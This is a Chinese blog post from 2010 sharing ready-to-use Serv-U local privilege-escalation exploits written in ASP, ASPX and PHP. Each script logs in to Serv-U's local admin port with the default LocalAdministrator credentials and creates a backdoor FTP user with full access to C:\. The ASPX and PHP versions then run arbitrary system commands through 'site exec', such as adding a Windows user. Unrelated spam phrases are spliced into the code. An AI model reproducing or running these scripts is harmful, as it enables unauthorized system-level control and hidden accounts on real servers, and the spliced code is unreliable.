分享serv-u利用脚本(asp aspx php) -- ●°灵感ofMУ.heaD﹋-- 编程爱好者博客

下面代码保留为servu.asp即可,应用了xml组件，树立一个lake 密码为admin123的可履行ftp帐号 <title>Serv-U 2 admin by lake2</title> <style type="text/css"> body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;} body {background-color: #ffffff;font-size:14px; } a:link {color: #0000FF;text-decoration: none;} a:visited {text-decoration: none;color: #0000FF;} a:hover {text-decoration: none;color: #FF0000;} a:active {text-decoration: none;color: #FF0000;} .buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5} .TextBox {border: 1px solid #084B8E} </style> <p>Serv-U Local Get SYSTEM Shell with ASP </p> <p>Author: lake2, <a http://lake2.0x54.org/" target=_blank>http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a></p> <form name="form1" method="post" action=""> <p>user: <input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator"> <br> pwd : <input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P"> <br> port: <input name="dport" type="text" class="TextBox" id="dport" value="43958"> <br> <input name="radiobutton" type="radio" value="add" checked class="TextBox"> Add User <input type="radio" name="radiobutton" value="del" class="TextBox"> Del User </p> <p> <input name="Submit" type="submit" class="buttom" value="Run"> </p> </form> <p> <% Usr = request.Form("duser") pwd = request.Form("dpwd") port = request.Form("dport") 'Command = request.Form("dcmd") if request.Form("radiobutton") = "add" Then lake2 = "User " & Usr & vbcrlf lake2 = lake2 & "Pass " & pwd & vbcrlf lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf 'lake2 = lake2 & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf lake2 = lake2 & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _ "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _ "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _ "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _ "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _ "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _ "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf 'lake2 = lake2 & "quit" & vbcrlf '-------- 'On Error Resume Next Set xPost = CreateObject("MSXML2.XMLHTTP") xPost.Open "POST", "http://127.0.0.1:"& port &"/lake2", True xPost.Send(lake2) Set xPOST=nothing response.write "FTP user lake pass admin123 :)<br><BR>" else lake2 = "User " & Usr & vbcrlf lake2 = lake2 & "Pass " & pwd & vbcrlf lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf lake2 = lake2 & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & " User=lake" & vbcrlf Set xPost3 = CreateObject("MSXML2.XMLHTTP") xPost3.Open "POST", "http://127.0.0.1:"& port &"/lake2", True xPost3.Send(lake2) Set xPOST3=nothing response.write "Done!<br><BR>" end if %> Only for Enjoy&Challenge ! </p> 下面保留为servu.aspx，应用servu的本地溢出履行命令 <%@ Page Language="VB" Debug="true" %> <%@ import Namespace="System.Net.Sockets" %> <script runat="server"> ' ' Love, Where are you ? Sub BTN_Start_Click(sender As Object, e As EventArgs) Dim Usr As String = Text_Name.Text Dim pwd As String = Text_PWD.Text Dim Port As Int32 = Text_Port.Text Dim Command As String = Text_cmd.Text Dim LoginUser As String = "User " & Usr & vbcrlf Dim LoginPass As String = "Pass " & pwd & vbcrlf ,热血三国名将; Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _ "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _ "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _ "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _ "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _ "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _ "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf Dim Quit As String = "QUIT" & vbcrlf Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf 'Dim client As New TcpClient Dim tcpClient As New TcpClient() Try tcpClient.Connect("127.0.0.1", port) Catch eee As Exception response.write(eee.ToString()) response.end End Try tcpClient.ReceiveBufferSize = 1024 Dim networkStream As NetworkStream = tcpClient.GetStream() Rec(networkStream) Send(networkStream, LoginUser) Rec(networkStream) Send(networkStream, LoginPass) Rec(networkStream) Send(networkStream, MAINTENANCE) Rec(networkStream) Send(networkStream, DelDomain) Rec(networkStream) Send(networkStream, NewDomain) Rec(networkStream) Send(networkStream, NewUser) Rec(networkStream) ,热血江湖不一样的糖果不一样的甜蜜; Dim tcpClient2 As New TcpClient() Try tcpClient2.Connect("127.0.0.1", 43859) Catch eee As Exception response.write(eee.ToString()) response.end End Try tcpClient2.ReceiveBufferSize = 1024 Dim networkStream2 As NetworkStream = tcpClient2.GetStream() Rec(networkStream2) Send(networkStream2, "User lake" & vbcrlf) Rec(networkStream2) Send(networkStream2, "pass admin123" & vbcrlf) Rec(networkStream2) Send(networkStream2, "site exec " & Command & vbcrlf) Rec(networkStream2) tcpClient2.Close() Send(networkStream, DelDomain) Rec(networkStream) Send(networkStream, Quit) Rec(networkStream) tcpClient.Close() End Sub Sub Rec(o As Object) If o.CanRead Then Dim bytes(1024) As Byte o.Read(bytes, 0, 1024) Dim returndata As String = Encoding.ASCII.GetString(bytes) response.Write("out:" & returndata & "<br>") Else response.Write("What's wrong ?") End If End Sub Sub Send(o As Object,data As String) If o.CanWrite Then Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data) o.Write(sendBytes, 0, sendBytes.Length) response.write("in: " & data & "<br>") Else response.Write("What's wrong ?") End If End Sub </script> <html> <head> </head> <body> <form runat="server"> <p> <asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2 admin by lake2</asp:Label> </p> <p> <asp:Label id="Label2" runat="server" width="40px">Name</asp:Label> <asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox> <br /> <asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label> <asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox> <br /> <asp:Label id="Label4" runat="server" width="40px">Port</asp:Label> <asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox> <br /> <asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label> <asp:TextBox id="Text_cmd" runat="server"></asp:TextBox> </p> <p> <asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>,给三十岁男人女人的一些悄悄话; </p> <p> <hr />  </p> </form> </body> </html> 下面保留为servu.php，是php版的servu本地溢出程序，可以履行命令。 <?php if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"])) { $sendbuf = ""; $recvbuf = ""; $domain = "-SETDOMAIN\r\n". "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n". "-TZOEnable=0\r\n". " TZOKey=\r\n"; $adduser = "-SETUSERSETUP\r\n". "-IP=0.0.0.0\r\n". "-PortNo=2121\r\n". "-User=Will_Be\r\n". ,热血江湖韩服官网; "-Password=Will_Be\r\n". ,喜欢; "-HomeDir=c:\\\r\n". "-LoginMesFile=\r\n". "-Disable=0\r\n". "-RelPaths=1\r\n". "-NeedSecure=0\r\n". "-HideHidden=0\r\n". "-AlwaysAllowLogin=0\r\n". "-ChangePassword=0\r\n". "-QuotaEnable=0\r\n". "-MaxUsersLoginPerIP=-1\r\n". "-SpeedLimitUp=0\r\n". "-SpeedLimitDown=0\r\n". "-MaxNrUsers=-1\r\n". "-IdleTimeOut=600\r\n". "-SessionTimeOut=-1\r\n". "-Expire=0\r\n". "-RatioUp=1\r\n". "-RatioDown=1\r\n". "-RatiosCredit=0\r\n". "-QuotaCurrent=0\r\n". "-QuotaMaximum=0\r\n". "-Maintenance=None\r\n". "-PasswordType=Regular\r\n". "-Ratios=None\r\n". " Access=c:\\|RELP\r\n"; $deldomain="-DELETEDOMAIN\r\n". "-IP=0.0.0.0\r\n". " PortNo=2121\r\n"; $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10); $recvbuf = fgets($sock, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; $sendbuf = "USER ".$_POST["User"]."\r\n"; fputs($sock, $sendbuf, strlen($sendbuf)); echo "<font color=blue>Send: $sendbuf</font><br>"; $recvbuf = fgets($sock, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; $sendbuf = "PASS ".$_POST["Pass"]."\r\n"; fputs($sock, $sendbuf, strlen($sendbuf)); echo "<font color=blue>Send: $sendbuf</font><br>"; $recvbuf = fgets($sock, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; $sendbuf = "SITE MAINTENANCE\r\n"; fputs($sock, $sendbuf, strlen($sendbuf)); echo "<font color=blue>Send: $sendbuf</font><br>"; $recvbuf = fgets($sock, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; $sendbuf = $domain; fputs($sock, $sendbuf, strlen($sendbuf)); echo "<font color=blue>Send: $sendbuf</font><br>"; $recvbuf = fgets($sock, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; $sendbuf = $adduser; fputs($sock, $sendbuf, strlen($sendbuf)); echo "<font color=blue>Send: $sendbuf</font><br>"; $recvbuf = fgets($sock, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; echo "**********************************************************<br>"; echo "Starting Exploit ...<br>"; echo "**********************************************************<br>"; $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10); $recvbuf = fgets($exp, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; $sendbuf = "USER Will_Be\r\n"; fputs($exp, $sendbuf, strlen($sendbuf)); echo "<font color=blue>Send: $sendbuf</font><br>"; $recvbuf = fgets($exp, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; $sendbuf = "PASS Will_Be\r\n"; fputs($exp, $sendbuf, strlen($sendbuf)); echo "<font color=blue>Send: $sendbuf</font><br>"; $recvbuf = fgets($exp, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; $sendbuf = "site exec ".$_POST["Command"]."\r\n"; fputs($exp, $sendbuf, strlen($sendbuf)); echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>"; $recvbuf = fgets($exp, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; echo "**********************************************************<br>"; echo "Starting Delete Domain ...<br>"; echo "**********************************************************<br>"; $sendbuf = $deldomain; fputs($sock, $sendbuf, strlen($sendbuf)); echo "<font color=blue>Send: $sendbuf</font><br>"; $recvbuf = fgets($sock, 1024); echo "<font color=red>Recv: $recvbuf</font><br>"; fclose($sock); fclose($exp); } ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>Serv-U Local Exploit By Will_Be</title> </head> <body> <form method="post"> LocalPort: <input name="Port" type="text" id="Port" value="43958"> <br> LocalUser: <input name="User" type="text" id="User" value="LocalAdministrator"> <br> LocalPass: <input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P"> <br> Command　: <input name="Command" type="text" id="Command" value="net user Will_Be heihei /add"> <br> <input type="submit" name="Submit" value="提交">　　 <input type="reset" name="Submit" value="重置"> </form> </body> </html>

博客介绍

正文

分享serv-u利用脚本(asp aspx php)2010-08-23 21:47:00

评论